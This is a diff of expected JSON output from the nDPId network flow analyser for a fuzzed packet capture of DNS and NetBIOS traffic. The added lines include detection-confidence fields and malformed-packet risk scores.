 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471048339,"flow_last_seen":1120471048339,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471048339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.114","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":237,"flow_packet_id":1,"flow_last_seen":1120471048339,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120471048339,"pkt":"ADBUADRWAODtAW69CABFAABIbFYAAIARSvvAqAECwKgBcgsLADUANESJJXMAAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471048339,"flow_last_seen":1120471048339,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471048339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.114","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471048339,"flow_last_seen":1120471048339,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471048339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.114","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471049334,"flow_last_seen":1120471049334,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471049334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1120471049334,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120471049334,"pkt":"ADBUADRWAODtAW69CABFAABIbFcAAIARSvrAqAECwKgBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaU15Alb4AAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471049334,"flow_last_seen":1120471049334,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471049334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercimy.v?","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":666,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471049334,"flow_last_seen":1120471049334,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471049334,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercimy.v?","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00407{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":667,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":18432,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120471051336,"pkt":"ADBUADRWAODtAW69SABFAABIbFgAAIARQvnAqAECwKgBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":667,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":18432}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471053339,"flow_last_seen":1120471053339,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1120471053339,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120471053339,"pkt":"ADBUADRWAODtAW69CABFAABIbFkAAIARSvjAqAECwKoBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJj8XR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":668,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471053339,"flow_last_seen":1120471053339,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberc?ty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":668,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471053339,"flow_last_seen":1120471053339,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471053339,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.170.1.1","src_port":2827,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberc?ty.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00406{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":669,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120471057345,"pkt":"ADBcADRHAODtAW69CABgAABIbFoAAIARSvfAqAECwKgBAQsLADUANESJ5TABAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liRXdjaXR5AmRrAAAhgAE="}
 00179{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":669,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048}
 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882846,"flow_last_seen":1120470882846,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":38709,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470882846,"flow_last_seen":1120470882846,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":38709,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470865712,"flow_last_seen":1120470874723,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2806,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470882726,"flow_last_seen":1120470882726,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2807,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470883845,"flow_last_seen":1120470885848,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2808,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1120469540839,"flow_last_seen":1120471020452,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":3392,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1120469540839,"flow_last_seen":1120471020452,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":3392,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470966852,"flow_last_seen":1120470975858,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2814,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065347,"flow_last_seen":1120471065347,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2828,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1120471065347,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120471065347,"pkt":"ADBUADRWAODtAW69CABFAABEJXMAAIARSvrAqAECwKgBAQsMADUAMOiAPDIAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065347,"flow_last_seen":1120471065347,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2828,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":670,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065347,"flow_last_seen":1120471065347,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471065347,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2828,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":671,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065349,"flow_last_seen":1120471065349,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120471065349,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2572,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1120471065349,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120471065349,"pkt":"AODtAW69ADBUADRWCABFAABbAAFAAEARtz7AqAEBwKgBAgA1CgwAR8r8PDKAAAABAAHJAAAAATEBMAEwAzEyN0ppbi1hZGRyBGFycGEAABwAAcAMAAwAAQBsJxAADwlsb2NhbGhvc3QA"}
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065349,"flow_last_seen":1120471065349,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120471065349,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2572,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471065349,"flow_last_seen":1120471065349,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120471065349,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2572,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471067211,"flow_last_seen":1120471067211,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120471067211,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":11,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1120471067211,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120471067211,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABObF0AAIARSfDAqAECwKgB\/wALAIkAOls0hWcBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471067211,"flow_last_seen":1120471067211,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120471067211,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":11,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471067211,"flow_last_seen":1120471067211,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120471067211,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":11,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471068711,"flow_last_seen":1120471068711,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"62.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1120471068711,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1120471068711,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABObF8AAIARSe4+qAECwKgB\/wCJAIkAOls0hWcBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNNQAgAAE="}
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471068711,"flow_last_seen":1120471068711,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"62.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
